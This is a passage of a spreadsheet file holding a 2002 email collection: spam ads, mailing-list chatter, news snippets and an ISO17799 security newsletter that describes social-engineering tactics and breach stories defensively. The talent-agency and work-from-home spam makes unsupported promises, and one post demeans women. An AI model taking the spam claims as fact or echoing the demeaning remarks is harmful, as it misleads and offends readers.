 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#006600"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"todd_rooks@twg-capital.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"TWG Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/twg/20020718-3b.gif" =
 width=3D"388" height=3D"82" alt=3D"TWG Capital Financial =
 Professionals"&gt;&lt;br&gt;
             &lt;a href=3D"http://www.twg-capital.com"&gt;&lt;font =
 size=3D"2"&gt;http://www.twg-capital.com&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
             &amp;nbsp;=20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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C255BB.E99F1F00--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Yet another case where 'marriage' is actually an inappropriate word
 &gt; for these guys.  What they want is 'housekeeper' 'dog' and
 &gt; 'prostitute'.
 So, you're saying that product bundling works? Good point.
 And how is this any different from "normal" marriage exactly? Other then
 that the woman not only gets a man, but one in a country where both she and
 her offspring will have actual opportunities? Oh and the lack of
 "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,Help 4 Health Newsletter
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Japa-crappers get high-tech
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541025
 Date: Not supplied
 Japanese toilet technology has developed creeping featuritis. New Tokyo toities 
 sport speech-recognition, air-conditioning, and body-chemistry monitors: 
     Japan's toilet wars started in February, when Matsushita engineers here 
     unveiled a toilet seat equipped with electrodes that send a mild electric 
     charge through the user's buttocks, yielding a digital measurement of 
     body-fat ratio. 
     Unimpressed, engineers from a rival company, Inax, counterattacked in April 
     with a toilet that glows in the dark and whirs up its lid after an infrared 
     sensor detects a human being. When in use, the toilet plays any of six 
     soundtracks, including chirping birds, rushing water, tinkling wind chimes, 
     or the strumming of a traditional Japanese harp.  
 Link[1] Discuss[2] (_Thanks, May[3]!_)
 [1] http://www.nytimes.com/2002/10/08/international/asia/08JAPA.html
 [2] http://www.quicktopic.com/boing/H/MQCtPB8LcUjsc
 [3] http://www.filterfine.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Looking for Actors, Models, Singers and Dancers!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Recruiting all those wanting a career in entertainment!!
 (acting, dancing, singing and modeling).
 World Star Talent Agency is actively pursuing new talent and 
 fresh faces.  Our professional experience ranges from modeling, 
 dancing, singing and acting.  We work for you to get your look
 in front of Talent Agents, Casting Directors, Producers,
 Modeling Agencies, Commercial Agencies, Print Agencies, 
 Video Media, TV, Theatrical and Cinema Agents. 
 We specialize and take pride in placing new talent. In fact,
 agencies are often looking just for that - New and fresh looks
 with little to no experience...... WE SPECIALIZE IN THIS!
 The following list represents some of the jobs we have helped
 place our clients in:
 TV and Cinema:
 The Practice
 Blow
 Friends
 Frazier
 ER
 Nash Bridges
 Legally Blonde
 Traffic
 TV Commercials:
 Budweiser
 Coca Cola
 Mitsubishi
 Castrol Oil 
 AT&amp;T
 Ford
 Print advertisements:    
 Polo
 Tommy Hilfiger
 Gap
 Ballys
 Guess
 Nautica
 Victoria's Secret
 Este Lauder
 Bebe
 Music Videos:
 Limp Bizcut
 Janet Jackson
 Brittany Spears
 Metallica
 Jessica Simpson
 And hundreds more....
 Your one time investment of only $19.95 covers our expenses 
 to put your photos and resume into our database. Once in our
 database your face and resume will be accessible by over a thousand
 Talent Agents, Casting Directors, Producers, Modeling Agencies,
 Commercial Agencies, Print Agencies, Video Media, TV, Theatrical,
 Cinema Agents and anyone else actively seeking new talent.  
 World Star Talent Agency is contracted to be paid by the 
 Talent Agents that hire you. We get paid only when you are hired.
 WE DO NOT MAKE MONEY UNLESS YOU DO!!
 What we need from you is:
 1. Headshot (full body shot optional)
 2. Your resume and or a brief story of yourself (bio). 
    Rest assured there is no entertainment experience necessary. 
    Just the desire to be in the entertainment industry.
 3. Your complete mailing address, telephone number, e-mail and
    all other contact information you can give us.
 4. A check or money order for $19.95 payable to:
    World Star Talent Agency Inc.
 5. Put all of the above in an envelope and mail to:
 World Star Talent Agency Inc.
 8491 Sunset Blvd. Suite 175
 Hollywood, CA 90069
 Why put it off today when you will be on your way to being a STAR tomorrow?
 Please no videos at this time.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
     R&gt; Things aren't all that bad. I remember Vancouver as having a
     R&gt; broad variety of good, local eateries.  And Toronto as having a
     R&gt; variety of good, local strip joints. ;-) 
 I haven't been to Van in years, but I do know that in Toronto, outside
 of the small deeply ethnic neighbourhoods, if you stray more than 50
 feet from Wellesley and Jarvis or Queen and Spadina, you're in
 doughnutland; there's far more like the eateries in the Eaton Centre
 than there are quaint cafes like McCaul north of Dundas, and the rare
 little eateries are not brimming with lunchtime traffic (you can still
 find a seat at noon at Village by the Grange)
 When most of Toronto does not live in those neighbourhoods but instead
 lives in Scarborough, Malton, Mississauga and Markham (franchisevilles), you
 will quickly see that one or two trendy strips does not save an entire
 nation.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The ISO17799 Newsletter - Issue 4
</t>
  </si>
  <si>
    <t xml:space="preserve">______________________________________________________
 THE ISO17799 NEWSLETTER - EDITION 4
 ______________________________________________________
 Welcome to the fourth edition of the ISO17799 newsletter, designed to
 keep you abreast of news and developments with respect to ISO17799 and
 information security. 
 The information contained in this newsletter is absolutely free to our
 subscribers and provides guidance on various practical issues, plus
 commentary on recent Information Security incidents. 
 Guidance and information included in this issue:
 1)  The ISO17799 Toolkit Uncovered 
 2)  Social Engineering - Are you Susceptible?
 3)  ISO17799: A World Wide Phenomena
 4)  Stranger Danger
 5)  ISO17700: More Frequently Asked Questions
 6)  Credit Card Transactions - Minimize the Risks
 7)  BSI Certifications - Congratulations
 8)  ISO17799 Section 11 - BCP Review
 9)  It Couldn't Happen Here.... Could It?
 10)  Subscription Information
 THE ISO17799 TOOLKIT UNCOVERED
 ==============================
 The ISO17799 standard can be acquired either stand alone or as part of
 an introductory pack appropriately called 'The ISO17799 Toolkit'. But
 why was it packaged thus, and what is included in the pack?  
 The purpose of the toolkit is to help organizations get off to a flying
 start with respect to ISO17799... not only to understand the standard
 itself but to begin to address many of the standard's requirements more
 quickly.
 The contents can be broken down into two groups: those that help the
 organization to understand where ISO17799 fits and what is involved in
 embracing it, and those that help an organization to take the first
 critical steps to compliance.
 In the former group are the 'RoadMap to Certification' (which broadly
 describes the process of gaining certification), the 'XL Management
 Presentation' (which explains the history, background and current status
 of the standard) and of course the ISO17799 standard itself (both
 parts).
 In the latter group are some key items to aid compliance. These include
 a comprehensive set of ISO17799 compliant security policies to address
 section 3 (Security Policy) and business continuity audit checklists to
 help address section 11 (Business Continuity Management).
 It doesn't end there, however. For the audit section there is a detailed
 set of audit questionnaires to address various issues and platforms. For
 newcomers to information security there is even a substantial glossary
 of terms.  
 Clearly, creating such a toolkit was a significant undertaking. However,
 in terms of helping organizations exploring the initial stages of
 ISO17799, it can be invaluable. 
 More information on the ISO17799 Toolkit and how to purchase can be
 found at: http://www.iso17799-made-easy.com
 The standard itself can alternatively be procured from:  
 http://www.iso17799.net 
 SOCIAL ENGINEERING - ARE YOU SUSCEPTIBLE?
 =========================================
 The term 'social engineering' can conjure up a variety of ideas, usually
 based around the concept of genetic tampering. However, when applied to
 IT security, it has its own implications and its own vocabulary.
 Following interviews with known computer criminals, a list of approaches
 has been produced. These are designed to gather information without the
 target even realizing that they have parted with it.
 The attempts are often made on an opportune bases, with common locations
 for this sort of activity being planes, trains and pubs. The telephone
 is probably the major source of pre-meditated acts.  
 The following are some of the major techniques employed:
 BAITING
 This essentially involves asking a variety of questions, including some
 leading questions designed to 'catch' the right answers. Often, items of
 conversation are introduced based upon replies received. The fiction is
 legitimized with small amounts of fact in the right places.
 PULLING RANK
 This amounts ot the perpetrator assuming a more senior position in the
 company than the victim and is usually enacted on the telephone. It does
 not necessitate direct impersonation... only the POSITION needs to be
 assumed. 
 EXHAUSTING
 This involves asking a constant stream of similar questions to wear down
 the target.
 SURF BOARDING
 Basically this is looking over someone's shoulder at something
 confidential. This could be directly, through a window, through a
 doorway, etc.
 SURVEYS
 The information given freely in surveys can often be extremely useful to
 a criminal. The surveys can initially be for entirely legitimate
 purposes, or can be completely bogus from the start. In either case
 sensitive information can often be obtained and unwittingly disclosed.
 There are of course many other techniques. However, disclosure can be
 prevented via the use of a series of common sense rules and policies. 
 Before releasing any information it is essential to at least establish:
 a) the sensitivity of the information
 b) your authority to exchange or release the information
 c) the real identity of the third party (proper authentication)
 d) the purpose of the exchange
 The act of exchange should also be recorded for audit purposes.
 ISO17799 - A WORLD WIDE PHENOMINA =================================
 Disney would have said "it's a small world after all", but the global
 take on of ISO17799 proves that organizations the planet over are
 embracing it with enthusiasm.
 To illustrate the global nature of the standard, we recently created a
 table from the last 500 purchases of the standard from the ISO17799
 Electronic Shop (www.iso17799.net). The figures below do come with a
 serious health warning though - the Electronic Shop is a credit card
 purchase system. Some cultures are not as comfortable or familiar as
 others with credit card purchase and will therefore have their purchase
 position significantly understated. An example is India, which acquires
 substantial numbers of the standard, only two of which show in the last
 500 from the download location.
 That aside, the table makes interesting reading:
 Argentina 1 
 Australia 6 
 Austria 5  
 Barbados 2 
 Belgium 5 
 Bermuda 1 
 Bosnia and Herzegovina 1 
 Brasil 2 
 Brazil 4 
 Canada 52 
 Cayman Islands 1 
 Chile 3 
 China 3 
 Colombia 5 
 Costa Rica 1 
 Croatia 1
 Cyprus 1 
 Denmark 5 
 Deutschland 5  
 Egypt 4 
 England 26 
 France 3 
 Germany 20 
 Greece 3 
 Guatemala 1 
 Hong Kong 7 
 Hungary 1 
 India 2 
 Indonesia 2 
 Ireland 11 
 Isle of Man 1 
 Israel 1 
 Italia 1 
 Italy 20 
 Japan 3 
 Malaysia 5 
 Mexico 9
 Netherlands 3 
 New Zealand 2 
 Northern Ireland 1 
 Norway 10 
 NZ 1 
 Panama 1 
 Portugal 1
 Russia 3 
 Sacramento 1 
 Scotland 3 
 Singapore 9
 Slovak Republic 1
 Slovenia 1
 South Africa 4
 Spain 9 
 Sultanate of Oman 1 
 Sweden 3 
 Switzerland 14 
 Taiwan 3 
 Thailand 2 
 The Netherlands 8
 Tunisia 1 
 Turkey 1 
 U.A.E 1 
 UK 51 
 United Arab Emirates 2 
 United Kingdom 24 
 United States 13 
 United States of America 25 
 USA 176 
 Venezuela 2 
 STRANGER DANGER
 ===============
 As you read this article, look around at your working environment. The
 items/information you have to hand may not seem very sensitive because
 you deal with them every day... but now look again.
 If you were alone and not a member of staff, how would you view them?
 What would you find if you looked around? Picture yourself as a visitor
 passing through. What can you hear in terms of conversation? What can
 you see?
 The chances are that you can hear and see quite a lot that you would not
 want to be openly disclosed to the outside world. If this is the case,
 the security of your information is at risk potentially from every
 visitor, stranger, subcontractor, etc. 
 This article is not written with the intention of discrediting visitors,
 but nonetheless, it is important to be fully AWARE of what CAN happen if
 due caution is not exercised.
 The following guidelines may help in ensuring that the risks are
 minimized:
 * Your reception/visitor area should issue distinctive badges and ensure
 that visitors wear them
 * Consider using different colored badges for each day of the week.
 * Challenge those who are not displaying any identity badges
 * If your location issues identity badges - make sure YOU wear yours
 * Do not be afraid to ask someone who they are visiting and what they
 are doing
 * Do not be lazy... escort visitors from reception (if applicable)...
 don't let them make their way to you
 * Do not hold doors open for people not displaying their ID
 * Do not leave visitors alone   
 ISO17799 - MORE FREQUENTLY ASKED QUESTIONS
 ==========================================
 1) How many controls are there in the standard?
 Part 1 is organized into 10 sections. There are 127 main controls and
 over 500 detailed controls in total.
 2) What is part 2?
 Part 2 basically explains how to apply the standard itself, and how to
 build and operate an information security management system.
 3) How old is it?
 The standard stems from an original publication in 1993, from the DTI in
 the UK. It became BS7799 in 1995 and of course ISO17799 in 2000.
 4) What is accreditation?
 An accreditation body can authorize others to "certify" third parties
 under the standard (p2). A number of accreditation bodies exist in
 different countries.
 5) Is certification for life?
 No. It is normally for three year periods.
 6) ISO17799 is used throughout the world, but was it internationally
 created? Yes indeed. The latest versions included input from
 representatives from many nations, including Australia, Brazil, Germany,
 Norway, UK and USA, amongst others.
 7) Is it linked to a specific national legal system?
 No. It is generic in terms of legislation.
 CREDIT CARD TRANSACTIONS: MINIMIZE THE RISKS
 ============================================
 The use of credit and debit cards to purchase goods and services has
 become an everyday convenience that we take for granted, but there are
 associated information security risks which we should pause to consider,
 especially when making payments over the Internet.  
 Web sites are becoming an increasingly popular means of purchasing goods
 and services, but they have also become popular targets for cyber
 criminals, who often use stolen credit card numbers to purchase goods,
 which can then be easily exchanged for cash.  There are also relatively
 simple technologies now readily available which could be used by hackers
 to surreptitiously steal vast amounts of money, a few pounds at a time,
 from millions of people. A survey by the IT research company Gartner
 (http://www.gartner.com) predicted that Internet crime involving the
 "mass victimization" of consumers could take place by the end of this
 year.  
 We recommend the following best practice guidelines to minimize the
 risks involved in credit card transactions:
 * Ensure that credit cards used to purchase goods or services on the
 Internet have a low credit limit, or if debit cards are used, that they
 have limited funds and are only topped up to cover specific Internet
 purchases.
 * All expenses incurred through Internet transactions should be
 carefully audited on a regular basis for any anomalies.
 * Only enter credit card details on a Web site if you are confident as
 to its authenticity and that the connection is secure - the prefix https
 (as opposed to the usual http) in the Web Site address indicates a
 secure connection.
 * If the security of a Web site is in doubt, any confidential
 information posted to it may be exposed to malicious intent.  Be
 extremely cautious when posting confidential details on any site where
 the Internet Service Provider hosting the site is not verified. Note
 that we have pre-checked all sites referenced in this newsletter for
 security!
 * If ordering by telephone using a credit card, ensure that you are
 talking to the correct person.  If you are unsure whether the
 organization you are dealing with will handle your details sensitively,
 pay by some other means.
 * Lost or stolen credit card details may be used for Internet
 transactions.  Inform the card issuer and relevant person within your
 organization immediately if a company credit card is lost or stolen.
 BSI - CERTIFICATIONS
 ====================
 Congratulations to all the following who have been certified by BSI with
 respect to BS7799 Part2 for at least one system in at least one
 location:
 7 Global, Accordis Acetate Chemicals Limited, Alenia Marconi Systems
 Ltd, American Society of Quality, AMOUN Pharmaceutical Co (Egypt),
 Attenda Limited, Business Coach IT Management, CADWEB Limited, Camelot
 Group Plc, Capita Business Services, Dai-Ichi Kangyo Bank Limited, DBI
 Consulting, Digex, DNP Facility Services Co Limited (Japan), Ericsson
 ESPA A S.A., Glaxo Wellcome Manufacturing (Singapore),GlaxoSmithKline,
 Hanvit Bank Korea, Hyundai Information Technology, Icfox International,
 Intergalis, Logic Systems Management, Macquarie Corporate
 Telecommunications Pty Limited Australia, Netstore Plc, NTT Data Corp,
 Paramount Computer Systems (UAE), PCCW Business eSolutions Hong Kong,
 S-Cube Inc, Serious Fraud Office, Siemens Business Services Trust Center
 (Munich), Stiki EHF (Iceland), Sony Bank Inc (Japan), Co-operative Bank
 Plc, The University of Texas, Total Network Solutions Limited, Unisys
 Limited, Vodafone Telecommerce GMBH, Volex Group Plc
 We intend to produce a more complete list in a future newsletter. We
 will also include certificates issued by the growing number of other
 certification bodies across the world.
 ISO17799 SECTION 11: BCP REVIEW 
 ===============================
 Business continuity planning is covered by section 11 of the standard, a
 core requirement of which is the creation and maintenance of a business
 continuity plan.
 Creating such a plan from scratch is a difficult undertaking of course.
 This is one reason why software products were produced. Unfortunately
 these often become problematic in themselves... difficult to learn,
 expensive, etc.
 Recent times have therefore seen a move to simplification, with
 organizations keen to avoid adding complexity to an already complex
 task. At the vanguard of this change was a product developed entirely in
 MS-Word: The BCP Generator.
 This was designed from top down to simplify business continuity
 planning. It comprises two components: a plan template and an
 interactive guide (the latter using Word macros to jump to and fro into
 the correct part of the template). It's impact upon the business
 continuity scene has been substantial, with organizations from the very
 largest to the smallest embracing the tool and its concepts. It is in
 active use in over 40 countries.
 With this change of emphasis in the business continuity planning market,
 there is now NO excuse for not creating a full recovery plan. The old
 lines of "too expensive" and "too difficult" are now less hollow than
 they ever were. Although section 11 is very clear with respect to the
 need of a comprehensive plan, it is surely also a matter of due
 diligence to have one, and equally, irresponsibility not to have one.
 For information on the BCP Generator see: 
 http://www.disaster-recovery-plan.com
 For information on business continuity generally, see:
 http://www.yourwindow.to/business-continuity/ 
 IT COULDN'T HAPPEN HERE....COULD IT?
 ====================================
 Every issue of The ISO17799 Newsletter features at least one TRUE story
 of an information security breach and its consequences. Again, in this
 issue, we focus upon 'low tech' but high impact incidents:
 1) On 25th October a contract programmer who had once worked for a large
 US based bank walked into the 'inner sanctum' of the main building (the
 security guards remembered him as someone permitted to do so). In the
 dealing room he claimed to be conducting a quality audit and
 interrogated a junior employee and watched a program run - noting down
 security codes as they were entered. He then left and hung around
 outside until just after normal trading time.
 He then rang the Bank from a public phone box and initiated an
 electronic funds transfer using the codes... $10.2m to a Swiss account. 
 The plan nearly failed when he found that he had noted one of the codes
 incorrectly, but he rang the Bank department back and incredibly managed
 to trick a different employee into revealing the correct digit.
 He flew to Switzerland and later returned with the money. He was caught
 simply because he couldn't resist boasting about his great feat. When
 the police contacted the bank they were still totally unaware of their
 loss!
 2) Remote, or dial-in access can be a real Achilles heel if not properly
 controlled. In a recent case a young hacker gained access to a major
 company's system by using the default password of a system engineer
 (which had never been changed!). 
 This gave him considerable scope and powers of access. To cover for
 himself, however, he semi-disabled the machine log, changed a number of
 user passwords, created several fictitious privileged users and tampered
 with the dial back system.
 Getting more ambitious he established a communication link with another
 computer and ended up making it crash. All this took place over a couple
 of evenings.
 To recover from the havoc the installation had to close down its prime
 computer and restore from the previous weeks back-up, at considerable
 cost.
 3) Over a period of nine months, the number of computer malfunctions
 within a large company had risen from an average of two per year to
 critical levels. The impact was such that the business fell behind with
 its invoicing systems and had to buy processing and backup from third
 parties. As it could not deliver some of its services reliably, it
 started to lose the confidence of its customers. The situation began to
 spiral. 
 Eventually, the company suspected foul play may be involved and called
 the police. Secret surveillance equipment was installed to monitor
 staff. One was filmed lightly scratching circuit boards in disk units
 and also attaching paper clips to them. Both these actions led to a
 short circuit.
 When confronted, he confessed everything. His motive was to earn
 overtime, which was required to process the overlap work which was
 delayed by the malfunction. He netted 689 UKP over the 9 months. The
 company lost at least 500,000 UKP.   
 CONTRIBUTIONS 
 =============
 Have you got something to say on the topic of ISO17799... a fresh
 insight or some information which might benefit others? If so, please
 feel free to contribute your submission to us. 
 ISO17799 NEWSLETTER REMINDER
 ============================
 We hope that you have found this newsletter to be informative, and
 hopefully useful in helping to address the ISO17799 issue. Future
 editions will pursue these ends further (and will include interviews,
 case studies and more). 
 Subscription to the ISO17799 Newsletter is free. Please do feel free to
 pass this copy on to friends and colleagues. If you do not wish to
 receive further copies, please email us at the address below with a
 title of Un-subscribe. 
 If your friends or colleagues wish to receive the newsletter directly,
 they should simply send a blank email to: iso17799@securityrisk.co.uk 
 Finally, BinaryNine Ltd accept no liability or responsibility for errors
 or omissions in this newsletter. This also applies to any loss or damage
 caused, arising directly or indirectly, by the use of or reliance on the
 information contained within.  Copyright 2002 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Thunder Stealing
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85399441
 Date: Not supplied
 Tony Davis wrote in his blog:
 _All Mozilla did is steal Netscape's thunder. _
 True, but if Netscape had actually bothered to put valuable additions into its 
 product, then that wouldn't have happened. Similarly, if Netscape hadn't taken 
 away valuable features from Mozilla, then maybe people would actually want to 
 use Netscape over Mozilla.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] nmap results
</t>
  </si>
  <si>
    <t xml:space="preserve">I had posted previously about the 2.4 kernel using iptables I ran nmap
 against. The IPID sequence generation was all zeros. Someone said this was
 indicative of earlier kernels but was fixed about 2.4.5 version. Since I'm
 running the latest what is causing this? I ran nmap against a 2.2 kernel
 using chains and it had better results than the stock 2.4 kernel.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: none
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello,
 This is a one time mailing. 
 We are looking for people who might be interested in
 working P/T from home.  This position involves working
 10-15 hours per week.   You can expect to make $15-$25
 per hour worked.  To see a job description, you may go to
 http://begintodaystarttomorrow.S5.com.com
 Have a great day!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</si>
  <si>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 apt.freshrpms.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Joshua wrote :
 &gt; Does anyone know how often the apt.freshrpms.net repository is 
 &gt; updated? Is it rsync'ed? It's quite a bit out of date right now. For a
 &gt; BIND update released mid-July, for example, it has:
 This is very strange... the Red Hat mirror update is run at least 3 or 4
 times a week, I'll look into it right now.
 Thanks for reporting this!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</si>
  <si>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The Evil Gerald Online - World Cup Issue Out Now!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C2191F.F02C2260
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Piggybacking ... we mean catering for the insatiable appetite for soccer =
 among soccer fans and people who just want the morning off work alike, =
 The Evil Gerald presents its World Cup Special
 Including such stories as Green Army wins hearts of Japanese people, =
 prostitutes
 and the truth behind Rivaldo's miraculous moving injuries.
 Also in this issue:
 Heinz in the soup over its Belfast Peas Wall initiative
 and Anger at demolition of Palestinian women.
 The Evil Gerald Staff
 ------=_NextPart_000_0007_01C2191F.F02C2260
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 5.50.4916.2300" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;Piggybacking&lt;/STRONG&gt; =
 ...&amp;nbsp;we mean=20
 &lt;STRONG&gt;catering&lt;/STRONG&gt; for the insatiable appetite for=20
 &lt;STRONG&gt;soccer&lt;/STRONG&gt; among &lt;STRONG&gt;soccer&lt;/STRONG&gt; fans and people =
 who just=20
 want the morning off work alike, &lt;A =
 href=3D"http://www.evilgerald.com"&gt;The Evil=20
 Gerald presents its World Cup Special&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Including such stories as &lt;A=20
 href=3D"http://www.evilgerald.com/Issues/Issue22/4JapaneseProstitutes.htm=
 "&gt;Green=20
 Army wins hearts of Japanese people, prostitutes&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;and the truth behind &lt;A=20
 href=3D"http://www.evilgerald.com/Issues/Issue22/3Rivaldo.htm"&gt;Rivaldo's =
 miraculous moving injuries&lt;/A&gt;.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Also in this issue:&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Heinz in the soup over its Belfast &lt;A=20
 href=3D"http://www.evilgerald.com/Issues/Issue22/7PeasWall.htm"&gt;Peas =
 Wall=20
 &lt;/A&gt;initiative&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;and &lt;A=20
 href=3D"http://www.evilgerald.com/Issues/Issue22/1NewsInBrief.htmm"&gt;Anger=
  at=20
 demolition of Palestinian women&lt;/A&gt;.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;The Evil Gerald Staff&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0007_01C2191F.F02C2260--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: US use of lie detector tests criticised
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8701111,1440/
 Date: Not supplied
 Government employees are routinely screened in a bid to spot spies - but the 
 testing is useless, says influential panel of scientists
</t>
  </si>
  <si>
